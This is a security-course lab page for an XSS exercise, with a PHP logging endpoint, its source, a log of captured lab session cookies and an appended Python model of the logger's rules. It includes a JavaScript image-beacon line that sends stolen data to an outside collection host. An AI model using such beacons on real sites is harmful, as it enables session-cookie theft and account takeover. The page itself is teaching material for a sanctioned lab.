Lab 4 Logging Script

You can use this server-side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:

(new Image()).src='https://css.csail.mit.edu/6.5660/2023/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();

The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.

Test form

If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)


ID: (some identifier to locate your payload in the log)
Payload: (the information you stole)

Logged entries

Below are the most recent logged entries, so that you can check if your attack worked:

Mon, 03 Jun 2024 12:17:10 -0400: Iluvata8: grader/TBEBJKEESRGR
Mon, 03 Jun 2024 12:16:38 -0400: Iluvata5: PyZoobarLogin=grader#422f1b0471041b0b67eb640b9cd20654ce171298c2e0e8cab2e2b8e9e9cad71e
Mon, 03 Jun 2024 12:16:30 -0400: Iluvata4: PyZoobarLogin=grader#091f680c1b49e64c92f6008ed9bc4262dd23d1c30ca0ce1cd2d339f3a2827a84
Mon, 03 Jun 2024 12:16:15 -0400: Iluvata2: PyZoobarLogin=grader#bd538664767dcda10343af9ae21e7462ec8f2831b8ec2241cce563b98fd40f68
Wed, 29 May 2024 12:18:52 -0400: Iluvata-chal: grader/IADILURVUXTK
Wed, 29 May 2024 12:18:40 -0400: Iluvata8: grader/UHRIVBCJYFUT
Wed, 29 May 2024 12:18:32 -0400: Iluvata8: grader/FIMHWDQVSDPE
Wed, 29 May 2024 12:18:06 -0400: Iluvata5: PyZoobarLogin=grader#eed9a5e52395413ab2c305a39b711e784a1da9f418f26ae9ce8cea221065eaf1
Wed, 29 May 2024 12:17:59 -0400: Iluvata4: PyZoobarLogin=grader#b13b7fdf2b4df70fb3f8db3a96bc59bbf6a4d7a2270d33d35cf543fb4ac90080
Wed, 29 May 2024 12:17:44 -0400: Iluvata2: PyZoobarLogin=grader#dc9811be7d6db75947660c19ebb0d5d742ad9c217a117da8758c62c86db7431b
Wed, 29 May 2024 12:12:39 -0400: Iluvata8: 234ssed/fs3w2a
Wed, 29 May 2024 12:11:48 -0400: Iluvata8: 2343/23423
Wed, 29 May 2024 12:11:30 -0400: Iluvata8: 2343/23423
Wed, 29 May 2024 12:11:08 -0400: Iluvata8: 2343/23423
Wed, 29 May 2024 12:07:26 -0400: Iluvata8: se/fee
Wed, 29 May 2024 11:21:16 -0400: Iluvata8: jyc/123
Wed, 29 May 2024 11:20:46 -0400: Iluvata9: jyc/123
Wed, 29 May 2024 11:19:57 -0400: Iluvata9: jyc/234
Wed, 29 May 2024 11:19:08 -0400: Iluvata9: zmy/123
Tue, 28 May 2024 16:22:38 -0400: Iluvata9: fese/fee
Tue, 28 May 2024 16:22:21 -0400: Iluvata9: fese/fwex
Tue, 28 May 2024 16:20:02 -0400: Iluvata-chal: qeeee/12322
Tue, 28 May 2024 16:16:16 -0400: Iluvata9: jyc/2342
Tue, 28 May 2024 16:15:56 -0400: Iluvata9: jyc/123
Tue, 28 May 2024 16:09:35 -0400: Iluvata8: jyc/123
Tue, 28 May 2024 16:08:16 -0400: Iluvata8: jyc/123
Tue, 28 May 2024 16:06:35 -0400: Iluvata8: jyc/123
Tue, 28 May 2024 16:02:56 -0400: Iluvata-chal: grader/DCAOPJLXPIFA
Tue, 28 May 2024 16:02:45 -0400: Iluvata8: grader/RJQXDFVVCSUL
Tue, 28 May 2024 16:02:38 -0400: Iluvata8: grader/XBJSLVBNWKYF
Tue, 28 May 2024 16:02:13 -0400: Iluvata5: PyZoobarLogin=grader#00c384aa1df2d5833c3a6ccb3ad82fc5f544353d4eba8cc385d1696cc768998c
Tue, 28 May 2024 16:02:05 -0400: Iluvata4: PyZoobarLogin=grader#c68f6ffd9dff92615c568b828c0949985826363b242b1e20fc6b65a3e0626f2a
Tue, 28 May 2024 16:01:53 -0400: Iluvata2: PyZoobarLogin=grader#5b7e282a23e1069ba828527d46ee1705d5a42463228b441cf398095f248a70b5
Tue, 28 May 2024 15:59:33 -0400: Iluvata-chal: were/eeee
Tue, 28 May 2024 15:08:27 -0400: Iluvata8: qwer/qwer
Tue, 28 May 2024 14:55:15 -0400: Iluvata8: jyc/123
Tue, 28 May 2024 14:49:37 -0400: Iluvata8: jyc/123
Tue, 28 May 2024 14:49:17 -0400: Iluvata8: jyc/1234
Tue, 28 May 2024 14:48:39 -0400: Iluvata8: jyc3/123456
Tue, 28 May 2024 14:47:59 -0400: Iluvata8: jyc2/12345
Tue, 28 May 2024 14:47:05 -0400: Iluvata8: jyc1/1234
Tue, 28 May 2024 14:46:42 -0400: Iluvata8: jyc1/1234
Tue, 28 May 2024 14:46:33 -0400: Iluvata8: jyc1/1234
Tue, 28 May 2024 14:46:10 -0400: Iluvata8: jyc1/1234
Tue, 28 May 2024 14:46:02 -0400: Iluvata8: jyc1/1231
Tue, 28 May 2024 14:41:55 -0400: Iluvata8: jyc/123
Tue, 28 May 2024 14:21:21 -0400: Iluvata8: jyc/123
Tue, 28 May 2024 13:51:28 -0400: Iluvata5: PyZoobarLogin=grader#8366a7af80f923d8f3d5f9252eb28cab15fac8127be71c0a9f939f8a6c4c285c
Tue, 28 May 2024 13:51:19 -0400: Iluvata4: PyZoobarLogin=grader#fed3e69c877d94d5387e812616ceead4ade5dc300b22f7b207310ffe8e5e6765
Tue, 28 May 2024 13:50:57 -0400: Iluvata2: PyZoobarLogin=grader#f5741ef6353eb11d53ed0082a0b33b6724c2990f76187d2f1d1f7741393b981d
Tue, 28 May 2024 13:45:27 -0400: Iluvata5: PyZoobarLogin=grader#d3ba86aa23481cec65fea93153321aeb38565a4b64fea3770f24020ba10d9572
Tue, 28 May 2024 13:45:21 -0400: Iluvata4: PyZoobarLogin=grader#b7fc469d82d210a1f0fd45422a9a78b4bfd4b48364d58d701d97cfa4ad6c96b2
Tue, 28 May 2024 13:45:07 -0400: Iluvata2: PyZoobarLogin=grader#fb96bd67529b7b7df4030ca990726513cf5c296cea67a2372047830b6746cc22
Tue, 28 May 2024 13:15:59 -0400: Iluvata5: PyZoobarLogin=grader#3a4dec551597e6cc80e58fe788bf2db3b5b3f03663d2ef9a81ba0f1a545d95bc
Tue, 28 May 2024 13:15:51 -0400: Iluvata4: PyZoobarLogin=grader#6b80be4d1016f602fa42002ed95da94348030edc25a7c192d549754cacc20c45
Tue, 28 May 2024 13:15:34 -0400: Iluvata2: PyZoobarLogin=grader#2b7ea105a1aa5016b5442d8f46dc814484c56457d94d95b8d44d9ef01f8d9881
Tue, 28 May 2024 08:34:41 -0400: Iluvata5: PyZoobarLogin=grader#bb9362fcb516db3da8c27e9fe2e842a5e08f13eb6d00a6330e22857866c82360
Tue, 28 May 2024 08:34:35 -0400: Iluvata4: PyZoobarLogin=grader#2369696d1c21a11e57abdc0ad221f9a65a2e72586fa0d409b61dd78a06b4da2a
Tue, 28 May 2024 08:34:20 -0400: Iluvata2: PyZoobarLogin=grader#6bcf2890b797a535b5014ffb4244d2890ceee38b737fef13b605cf92a10a62c1
Tue, 28 May 2024 08:30:03 -0400: Iluvata5: PyZoobarLogin=grader#450692ff9e7f9a6c4f22c2b91f3fbf048885a39dde100512a62cac3665581dfb
Tue, 28 May 2024 08:29:55 -0400: Iluvata4: PyZoobarLogin=grader#8061568cd245666e7bcf65dbdd8f676f5b894f7bce111ff095e6ad8f0eb9e2b4
Tue, 28 May 2024 08:29:41 -0400: Iluvata2: PyZoobarLogin=grader#7ea95dd55ae0d1770bccf43bd58fe6ec91eac3e229a33aaa08e3022996725f29
Tue, 28 May 2024 08:24:39 -0400: Iluvata5: PyZoobarLogin=grader#7562b8b1c0718fef68192ae46e3be90799cdabe2bb6d4a01fcc3f009c34c575d
Tue, 28 May 2024 08:24:32 -0400: Iluvata4: PyZoobarLogin=grader#0f23ced70e9aa9c09aeea6937e2ffbbcde81b22ee615515b780ba15b8ae70003
Tue, 28 May 2024 08:24:17 -0400: Iluvata2: PyZoobarLogin=grader#97d3bf7b01cec5fdd33e431c6b3275a3ad0074902af820617cc112e20228f103
Tue, 28 May 2024 08:22:34 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178
Tue, 28 May 2024 08:22:27 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178
Tue, 28 May 2024 08:22:20 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178
Tue, 28 May 2024 08:21:09 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178
Tue, 28 May 2024 08:21:03 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178
Tue, 28 May 2024 08:20:56 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178
Tue, 28 May 2024 08:19:57 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178
Tue, 28 May 2024 08:19:39 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178
Tue, 28 May 2024 08:19:31 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178
Tue, 28 May 2024 08:19:05 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178
Tue, 28 May 2024 08:10:45 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178
Tue, 28 May 2024 08:10:03 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178
Tue, 28 May 2024 08:09:41 -0400: Iluvata5: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178
Tue, 28 May 2024 08:06:13 -0400: Iluvata4: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178
Tue, 28 May 2024 08:02:05 -0400: Iluvata4: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178
Tue, 28 May 2024 08:01:38 -0400: Iluvata4: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178
Tue, 28 May 2024 07:59:07 -0400: Iluvata4: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178
Tue, 28 May 2024 07:56:56 -0400: Iluvata4: PyZoobarLogin=jyc#abafbba5cc1c3a36d3a986aa8ca0f2e074f70b725f30bdea8fcb28cd1b575178
Mon, 27 May 2024 14:35:52 -0400: Iluvata: PyZoobarLogin=grader#f7754a74aa93e7f5594297087967f2e482bc2943b8cb5b818894c88672893dc4
Mon, 27 May 2024 14:34:10 -0400: Iluvata: PyZoobarLogin=jyc#40647e25aba3751620f07b7ef51023bbb17bd2cbce51a3fbccca9b944d5a6fdd
Mon, 27 May 2024 14:32:08 -0400: Iluvata: PyZoobarLogin=jyc
Mon, 27 May 2024 14:27:56 -0400: Iluvata: some-stringaaa
Mon, 27 May 2024 14:22:26 -0400: my-username: some-string
Mon, 27 May 2024 14:17:53 -0400: my-username: some-string
Mon, 27 May 2024 14:17:40 -0400: Iluvata: some-string
Mon, 27 May 2024 14:15:37 -0400: my-username: some-string

Source code

In case you are curious, here is the source code of this page.


<?php
header("Access-Control-Allow-Origin: *");

// Handle a logging request if an "id" parameter is present; otherwise fall
// through and render the page below.
do {
    if (!array_key_exists("id", $_REQUEST)) {
        break;
    }

    $id = $_REQUEST['id'];
    if (strlen($id) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "ID value is larger than 1000 bytes";
        return;
    }

    if (!array_key_exists("payload", $_REQUEST)) {
        header("HTTP/1.0 400 Bad Request");
        echo "No payload given";
        return;
    }

    $payload = $_REQUEST['payload'];
    if (empty($payload)) {
        header("HTTP/1.0 400 Bad Request");
        echo "Empty payload given";
        return;
    }

    if (strlen($payload) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "Payload is larger than 1000 bytes";
        return;
    }

    if (!function_exists('apcu_add')) {
        header("HTTP/1.0 501 Not Implemented");
        echo "APCu not enabled, so no rate limiting; refusing all requests";
        return;
    }

    // apcu_add() only succeeds if the key is not already cached; with a 5 second
    // TTL this rejects an identical payload resent within that window.
    if (apcu_add($payload, true, 5) === false) {
        // exact same $payload was sent in the past 5 seconds
        header("HTTP/1.0 429 Too Many Requests");
        echo "That exact payload was sent very recently; rejecting";
        return;
    }

    // Strip line breaks so one request cannot forge extra log lines.
    $payload = str_replace(array("\n", "\r"), '.', $payload);
    $id = str_replace(array("\n", "\r"), '.', $id);

    $file = fopen("/tmp/6.5660-2023-logger.txt", "c+");
    if ($file === false) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to open log file";
        return;
    }

    if (!flock($file, LOCK_EX)) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to lock log file";
        return;
    }

    // Keep at most the 100 most recent existing lines, then rewrite the file
    // with the new entry on top.
    $lines = array();
    while (!feof($file) && count($lines) < 100) {
        $line = fgets($file);
        if ($line !== false) {
            $lines[] = $line;
        }
    }
    ftruncate($file, 0);
    rewind($file);
    fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n");
    foreach ($lines as $line) {
        fwrite($file, $line);
    }

    flock($file, LOCK_UN);
    fclose($file);

    echo "Logged!";
    return;
} while (0);

$link = "(new Image()).src=" .
      "'https://css.csail.mit.edu/6.5660/2023/labs/log.php?'" .
      " + 'id=my-username'" .
      " + '&payload=some-string' + '&random='" .
      " + Math.random()";
?><!DOCTYPE html>
<html>
    <head>
        <link rel="stylesheet" type="text/css" href="labs.css" />
        <title>Lab 4 Logging Script</title>
    </head>
    <body>
        <h1>Lab 4 Logging Script</h1>
        <p>
            You can use this server side script to extract data from
            client-side JavaScript. For example, clicking this client-side
            hyperlink will cause the server to log the payload:
        </p>
        <pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre>
        <p>
            The random argument is ignored, but ensures that the browser
            bypasses its cache when downloading the image. We suggest that you
            use the random argument in your scripts as well.  The ID argument
            will help you distinguish your log entries from those sent by other
            students; we suggest picking your MIT Athena username.  Newlines are not
            allowed in <tt>javascript:</tt> links; if this bothers you, try
            <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>.
        </p>

        <h2>Test form</h2>
        <p>
            If you just want to try out the script, you can use this form.
            (For your actual attacks in lab 4, you'll probably want to use the
            JavaScript image technique shown above.)
        </p>

        <form method="GET" action="">
            <label for="id">ID:</label><br />
            <input name="id" placeholder="your-mit-username" size="40" />
            <i>(some identifier to locate your payload in the log)</i>
            <br />
            <br />
            <label for="payload">Payload:</label><br />
            <input name="payload" placeholder="some-string" size="40" />
            <i>(the information you stole)</i>
            <br />
            <input type="submit" value="Log" name="log_submit" />
        </form>

        <h2>Logged entries</h2>
        <p>
            Below are the most recent logged entries, so that you can check
            if your attack worked:
        </p>

        <pre class="tty"><?php
            $lines = file_get_contents("/tmp/6.5660-2023-logger.txt");
            echo htmlspecialchars($lines);
        ?></pre>

        <h2>Source code</h2>
        <p>In case you are curious, here is the source code of this page.</p>
        <pre><?php highlight_file(__FILE__); ?></pre>
    </body>
</html>
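The script above enforces four server-side rules before anything reaches the log file: a 1000-byte cap on the id and on the payload, rejection of an identical payload resent within 5 seconds (via apcu_add), replacement of CR/LF so a request cannot forge a second log line, and a bounded file that keeps the new entry plus at most 100 previous ones. The following Python model is an added example, not the course's code and not part of this page; it reproduces those rules in memory so they can be exercised without PHP or APCu, and adds a parser for the `timestamp: id: payload` line format the script writes. The names LogServer, parse_entry and payloads_for, the injectable clock, and the sample ids and payloads are all constructed for the example.

```python
import time
from datetime import datetime, timezone
from email.utils import format_datetime

MAX_LEN = 1000        # strlen() cap on both the id and the payload, in bytes
DEDUP_WINDOW = 5.0    # apcu_add() TTL: an identical payload within 5 s is rejected
KEEP_LINES = 100      # at most 100 previous lines are rewritten below the new entry


class LogServer:
    """In-memory model of log.php (constructed example): one log() per request."""

    def __init__(self, clock=time.monotonic):
        self.lines = []      # newest entry first, as the rewritten file is laid out
        self.recent = {}     # payload -> expiry time; stands in for the APCu cache
        self.clock = clock   # injectable so the 5 s window can be tested deterministically

    def log(self, id_, payload):
        """Return (status, body) for one request; 200 means the entry was written."""
        if len(id_.encode()) > MAX_LEN:           # PHP strlen() counts bytes
            return 413, "ID value is larger than 1000 bytes"
        if payload is None:                       # "payload" key absent from $_REQUEST
            return 400, "No payload given"
        if payload in ("", "0"):                  # PHP empty() treats "0" as empty too
            return 400, "Empty payload given"
        if len(payload.encode()) > MAX_LEN:
            return 413, "Payload is larger than 1000 bytes"

        now = self.clock()
        self.recent = {p: t for p, t in self.recent.items() if t > now}
        if payload in self.recent:                # apcu_add() fails when the key exists
            return 429, "That exact payload was sent very recently; rejecting"
        self.recent[payload] = now + DEDUP_WINDOW

        # CR/LF are replaced before writing, so one request can never inject a
        # second log line; the whole entry stays on a single line.
        id_ = id_.replace("\n", ".").replace("\r", ".")
        payload = payload.replace("\n", ".").replace("\r", ".")
        stamp = format_datetime(datetime.now(timezone.utc))   # RFC 2822, like DATE_RFC2822
        # The new entry goes on top, followed by at most KEEP_LINES old ones,
        # so the file settles at KEEP_LINES + 1 lines.
        self.lines = [f"{stamp}: {id_}: {payload}"] + self.lines[:KEEP_LINES]
        return 200, "Logged!"


def parse_entry(line):
    """Split one log line into (timestamp, id, payload).

    The RFC 2822 timestamp contains ':' but never ': ', so splitting on ': ' at
    most twice recovers the three fields even when the payload itself contains
    ': '. An id containing ': ' would be mis-parsed; the script does not prevent that.
    """
    timestamp, id_, payload = line.rstrip("\n").split(": ", 2)
    return timestamp, id_, payload


def payloads_for(lines, id_):
    """Payloads logged under a given id, newest first."""
    return [p for (_, i, p) in map(parse_entry, lines) if i == id_]


if __name__ == "__main__":
    server = LogServer()
    print(server.log("my-username", "some-string"))   # (200, 'Logged!')
    print(server.log("my-username", "some-string"))   # duplicate within 5 s -> 429
    print(payloads_for(server.lines, "my-username"))
```

The injectable clock is what makes the 5-second window testable: advance it past DEDUP_WINDOW and the same payload is accepted again, exactly as the APCu entry would have expired. The length checks operate on UTF-8 bytes rather than characters to match PHP's strlen().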